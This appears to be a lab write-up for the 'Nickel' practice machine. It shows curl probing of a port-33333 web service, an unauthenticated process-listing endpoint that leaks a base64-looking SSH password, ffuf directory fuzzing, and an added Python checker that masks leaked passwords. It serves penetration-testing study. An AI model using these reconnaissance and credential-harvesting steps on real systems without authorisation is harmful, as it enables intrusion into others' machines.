Web


Nmap discovered a web server on target port 33333. The running service is Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -i http://$IP:33333/
HTTP/1.1 200 OK
Content-Length: 13
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 Mar 2025 17:55:13 GMT
 
Invalid Token

Webroot

Requesting the webroot returns "Invalid Token". Is the web server expecting a token?

Hidden Endpoints


Checking the endpoints discovered through the web application on target port 8089: none of them accept GET requests. Since the current web server only supports GET and POST, I will try POST.

POST


N/A for the /list-current-deployments endpoint

N/A for the /list-active-nodes endpoint

200 for the /list-running-procs endpoint

/list-running-procs endpoint


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -X POST http://$IP:33333/list-running-procs -H 'Content-Length: 0'           
 
 
name        : System Idle Process
commandline : 
 
name        : System
commandline : 
 
name        : Registry
commandline : 
 
name        : smss.exe
commandline : 
 
name        : csrss.exe
commandline : 
 
name        : wininit.exe
commandline : 
 
name        : csrss.exe
commandline : 
 
name        : winlogon.exe
commandline : winlogon.exe
 
name        : services.exe
commandline : 
 
name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe
 
name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"
 
name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"
 
name        : dwm.exe
commandline : "dwm.exe"
 
name        : Memory Compression
commandline : 
 
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
 
name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
 
name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
 
name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
 
name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
 
name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
 
name        : vm3dservice.exe
commandline : C:\Windows\system32\vm3dservice.exe
 
name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
 
name        : vm3dservice.exe
commandline : vm3dservice.exe -n
 
name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
 
name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
 
name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
 
name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3956855 /state1:0x41c64e6d
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : MicrosoftEdgeUpdate.exe
commandline : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
 
name        : SgrmBroker.exe
commandline : 
 
name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

Sending a POST request to the /list-running-procs endpoint lists the running processes, and one of those entries exposes a credential. The full command line is: cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh. The credential, ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK, appears to be an SSH credential for the nickel-dev host.

Additionally, these 3 command lines appear to be responsible for the web servers on ports 80, 8089 and 33333.
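The exposure above is easy to audit for at scale. As an added example (not part of the original writeup), the following Python checker parses the endpoint's "name : / commandline :" record format, including the wrapped command line, and flags any process whose arguments carry a password-style switch, reporting the finding with the value masked and noting whether it has a base64-like shape. The sample output, its placeholder secret, and the helper names parse_proc_list and find_exposed_credentials are all constructed for this example.

```python
import re
# Constructed sample in the endpoint's "key : value" record format; the wrapped
# command line (indented second line) mirrors the real output. Placeholder secret.
SAMPLE_OUTPUT = """\
name        : lsass.exe
commandline : C:\\Windows\\system32\\lsass.exe

name        : cmd.exe
commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p
              "cGxhY2Vob2xkZXItc2VjcmV0Cg==" --server nickel-dev --protocol ssh

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws33333.ps1
"""
# Password-style switches and their value, user switches, and a base64-looking shape.
CRED_FLAG = re.compile(r'(?i)(?:^|\s)(--password|--pass|-pw|-p|/p)(?:\s+|[=:])"?([^\s"]+)"?')
USER_FLAG = re.compile(r'(?i)(?:^|\s)(?:--username|--user|-u)[\s=:]+"?([^\s"]+)"?')
BASE64_LIKE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')

def parse_proc_list(text: str) -> list:
    """Parse blank-line separated records; an indented line continues the previous value."""
    records, current, last_key = [], {}, None
    for raw in text.splitlines():
        if not raw.strip():                      # record separator
            if current:
                records.append(current)
            current, last_key = {}, None
        elif raw[0].isspace() and last_key:      # wrapped continuation of previous value
            current[last_key] += " " + raw.strip()
        else:
            key, _, value = raw.partition(":")
            last_key = key.strip()
            current[last_key] = value.strip()
    if current:
        records.append(current)
    return records

def find_exposed_credentials(text: str) -> list:
    """Report processes whose command line carries a password argument; mask the value."""
    findings = []
    for rec in parse_proc_list(text):
        cmd = rec.get("commandline", "")
        for m in CRED_FLAG.finditer(cmd):
            secret, user = m.group(2), USER_FLAG.search(cmd)
            findings.append({"process": rec.get("name", "?"), "flag": m.group(1),
                             "user": user.group(1) if user else "",
                             "masked": secret[:2] + "*" * (len(secret) - 2),  # never log it
                             "base64_like": bool(BASE64_LIKE.fullmatch(secret))})
    return findings
```

The same parser can be pointed at the raw response body of the endpoint to catch this class of leak before it reaches a report or log.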

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:33333/FUZZ -ic -fs 16
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.219.99:33333/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 16
________________________________________________
:: Progress: [20478/20478] :: Job [1/1] :: 1626 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP:33333/FUZZ/ -ic -fs 16
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.219.99:33333/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 16
________________________________________________
:: Progress: [207630/207630] :: Job [1/1] :: 1600 req/sec :: Duration: [0:02:12] :: Errors: 0 ::

N/A